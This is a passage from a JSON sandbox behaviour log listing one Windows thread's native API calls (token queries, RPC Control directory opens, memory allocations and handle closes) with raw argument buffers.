                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1302
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34b3f7a",
            "parentcaller": "0x7ffee3350ed7",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1303
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee3350cd1",
            "parentcaller": "0x7ffee337e1fa",
            "category": "filesystem",
            "api": "NtOpenDirectoryObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "DirectoryHandle",
                "value": "0x00000490"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020001",
                "pretty_value": "FILE_READ_ACCESS|READ_CONTROL"
              },
              {
                "name": "ObjectAttributes",
                "value": "C:\\RPC Control"
              }
            ],
            "repeated": 0,
            "id": 1304
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee110026b",
            "parentcaller": "0x7ffee3350daf",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x0000048c"
              }
            ],
            "repeated": 0,
            "id": 1305
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34a8cde",
            "parentcaller": "0x7ffee34e9c4e",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "10"
              },
              {
                "name": "TokenInformation",
                "value": "\\xe7J\\x07\\x00\\x00\\x00\\x00\\x00\\xc2o\\x01\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00l\\xdf\\x06\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1306
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6e46",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "4"
              },
              {
                "name": "TokenInformation",
                "value": "H2\\x96\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00w\\x00s\\x00\\\\x00S\\x00y\\x00s\\x00t\\x00e\\x00m\\x003\\x002\\x00\\\\x00r\\x00a\\x00s\\x00a\\x00d\\x00h\\x00l\\x00p\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00FO"
              }
            ],
            "repeated": 0,
            "id": 1307
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6e9b",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "25"
              },
              {
                "name": "TokenInformation",
                "value": "\\x10$\\x96\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1308
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6ec0",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": false,
            "return": "0xffffffffc0000023",
            "pretty_return": "BUFFER_TOO_SMALL",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "5"
              },
              {
                "name": "TokenInformation",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1309
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6f0e",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "5"
              },
              {
                "name": "TokenInformation",
                "value": "\\xa8\\xd0\\x98\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\x01\\x02\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1310
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6f37",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": false,
            "return": "0xffffffffc0000023",
            "pretty_return": "BUFFER_TOO_SMALL",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "6"
              },
              {
                "name": "TokenInformation",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1311
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6f8f",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "6"
              },
              {
                "name": "TokenInformation",
                "value": "\\x88%\\x96\\x00\\x00\\x00\\x00\\x00\\x02\\x00P\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x10\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x10\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x12\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\xa0\\x01\\x03\\x00\\x00\\x00\\x00\\x00\\x05\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1do\\x01\\x00"
              }
            ],
            "repeated": 0,
            "id": 1312
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d7048",
            "parentcaller": "0x7ffee34d6fa8",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "41"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x88\\x9b\\x8f\\xb7\\xfe\\x7f\\x00\\x00+\\x06h\\xb7\\xfe\\x7f\\x00\\x005\\xa6\\x99\\xb1U\\x13\\x00\\x00\\x80\\xba\\x8b\\xb7\\xfe\\x7f\\x00\\x00`\\xe1\\x15\\x07\\x00\\x00\\x00\\x00X\\xe1\\x15\\x07\\x00\\x00\\x00\\x00(\\xe1\\x15\\x07\\x00\\x00\\x00\\x00H\\xe1\\x15\\x07"
              }
            ],
            "repeated": 0,
            "id": 1313
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d707b",
            "parentcaller": "0x7ffee34d6fa8",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "41"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80%\\x96\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19{i\\xb7\\xfe\\x7f\\x00\\x00#\\x00\\x00\\xc0\\x00\\x00\\x00\\x00H\\xdf\\x15\\x07\\x00\\x00\\x00\\x00\\x8c\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x9a\\x00i\\xa3\\xfe\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xaa\n\\x8c\\xb7"
              }
            ],
            "repeated": 0,
            "id": 1314
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34a8cde",
            "parentcaller": "0x7ffee34a953a",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "10"
              },
              {
                "name": "TokenInformation",
                "value": "\\xe7J\\x07\\x00\\x00\\x00\\x00\\x00\\xc2o\\x01\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00l\\xdf\\x06\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1315
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6e46",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "4"
              },
              {
                "name": "TokenInformation",
                "value": "\\x88(\\x96\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1316
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d4b000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1317
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6e9b",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "25"
              },
              {
                "name": "TokenInformation",
                "value": "0\\xb1\\xd4\\x05\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1318
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6ec0",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": false,
            "return": "0xffffffffc0000023",
            "pretty_return": "BUFFER_TOO_SMALL",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "5"
              },
              {
                "name": "TokenInformation",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1319
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6f0e",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "5"
              },
              {
                "name": "TokenInformation",
                "value": "\\x88\\xcf\\x98\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\x01\\x02\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1320
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6f37",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": false,
            "return": "0xffffffffc0000023",
            "pretty_return": "BUFFER_TOO_SMALL",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "6"
              },
              {
                "name": "TokenInformation",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1321
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6f8f",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "6"
              },
              {
                "name": "TokenInformation",
                "value": "\\x88\\xae\\xd4\\x05\\x00\\x00\\x00\\x00\\x02\\x00P\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x10\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x10\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x12\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\xa0\\x01\\x03\\x00\\x00\\x00\\x00\\x00\\x05\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1do\\x01\\x00"
              }
            ],
            "repeated": 0,
            "id": 1322
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d7048",
            "parentcaller": "0x7ffee34d6fa8",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "41"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x88\\x9b\\x8f\\xb7\\xfe\\x7f\\x00\\x00+\\x06h\\xb7\\xfe\\x7f\\x00\\x00\\x95\\xab\\x99\\xb1U\\x13\\x00\\x00\\x80\\xba\\x8b\\xb7\\xfe\\x7f\\x00\\x00\\xc0\\xdd\\x15\\x07\\x00\\x00\\x00\\x00\\xb8\\xdd\\x15\\x07\\x00\\x00\\x00\\x00\\x88\\xdd\\x15\\x07\\x00\\x00\\x00\\x00\\xa8\\xdd\\x15\\x07"
              }
            ],
            "repeated": 0,
            "id": 1323
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d707b",
            "parentcaller": "0x7ffee34d6fa8",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "41"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\xae\\xd4\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19{i\\xb7\\xfe\\x7f\\x00\\x00#\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\xa8\\xdb\\x15\\x07\\x00\\x00\\x00\\x00\\x8c\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x9a\\x00i\\xa3\\xfe\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xaa\n\\x8c\\xb7"
              }
            ],
            "repeated": 0,
            "id": 1324
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee3350e27",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              }
            ],
            "repeated": 0,
            "id": 1325
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee3350e49",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              }
            ],
            "repeated": 0,
            "id": 1326
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34b3f7a",
            "parentcaller": "0x7ffee3350ed7",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1327
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee3350cd1",
            "parentcaller": "0x7ffee3381530",
            "category": "filesystem",
            "api": "NtOpenDirectoryObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "DirectoryHandle",
                "value": "0x0000048c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020001",
                "pretty_value": "FILE_READ_ACCESS|READ_CONTROL"
              },
              {
                "name": "ObjectAttributes",
                "value": "C:\\RPC Control"
              }
            ],
            "repeated": 0,
            "id": 1328
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee110026b",
            "parentcaller": "0x7ffee3350daf",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x00000490"
              }
            ],
            "repeated": 0,
            "id": 1329
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34a8cde",
            "parentcaller": "0x7ffee34e9c4e",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "10"
              },
              {
                "name": "TokenInformation",
                "value": "\\xe7J\\x07\\x00\\x00\\x00\\x00\\x00\\xc2o\\x01\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00l\\xdf\\x06\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1330
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6e46",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "4"
              },
              {
                "name": "TokenInformation",
                "value": "H2\\x96\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00w\\x00s\\x00\\\\x00S\\x00y\\x00s\\x00t\\x00e\\x00m\\x003\\x002\\x00\\\\x00r\\x00a\\x00s\\x00a\\x00d\\x00h\\x00l\\x00p\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00FO"
              }
            ],
            "repeated": 0,
            "id": 1331
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6e9b",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "25"
              },
              {
                "name": "TokenInformation",
                "value": "\\x10$\\x96\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1332
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6ec0",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": false,
            "return": "0xffffffffc0000023",
            "pretty_return": "BUFFER_TOO_SMALL",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "5"
              },
              {
                "name": "TokenInformation",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1333
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6f0e",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "5"
              },
              {
                "name": "TokenInformation",
                "value": "\\xb8\\xd2\\x98\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\x01\\x02\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1334
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6f37",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": false,
            "return": "0xffffffffc0000023",
            "pretty_return": "BUFFER_TOO_SMALL",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "6"
              },
              {
                "name": "TokenInformation",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1335
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6f8f",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "6"
              },
              {
                "name": "TokenInformation",
                "value": "\\x88%\\x96\\x00\\x00\\x00\\x00\\x00\\x02\\x00P\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x10\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x10\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x12\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\xa0\\x01\\x03\\x00\\x00\\x00\\x00\\x00\\x05\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1do\\x01\\x00"
              }
            ],
            "repeated": 0,
            "id": 1336
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d7048",
            "parentcaller": "0x7ffee34d6fa8",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "41"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x88\\x9b\\x8f\\xb7\\xfe\\x7f\\x00\\x00+\\x06h\\xb7\\xfe\\x7f\\x00\\x00\\x95\\xa9\\x99\\xb1U\\x13\\x00\\x00\\x80\\xba\\x8b\\xb7\\xfe\\x7f\\x00\\x00\\xc0\\xdf\\x15\\x07\\x00\\x00\\x00\\x00\\xb8\\xdf\\x15\\x07\\x00\\x00\\x00\\x00\\x88\\xdf\\x15\\x07\\x00\\x00\\x00\\x00\\xa8\\xdf\\x15\\x07"
              }
            ],
            "repeated": 0,
            "id": 1337
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d707b",
            "parentcaller": "0x7ffee34d6fa8",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "41"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80%\\x96\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19{i\\xb7\\xfe\\x7f\\x00\\x00#\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\xa8\\xdd\\x15\\x07\\x00\\x00\\x00\\x00\\x90\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x9a\\x00i\\xa3\\xfe\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xaa\n\\x8c\\xb7"
              }
            ],
            "repeated": 0,
            "id": 1338
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34a8cde",
            "parentcaller": "0x7ffee34a953a",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "10"
              },
              {
                "name": "TokenInformation",
                "value": "\\xe7J\\x07\\x00\\x00\\x00\\x00\\x00\\xc2o\\x01\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00l\\xdf\\x06\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1339
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6e46",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "4"
              },
              {
                "name": "TokenInformation",
                "value": "\\x88(\\x96\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1340
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34d6e9b",
            "parentcaller": "0x7ffee34a8d8f",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "25"
              },
              {
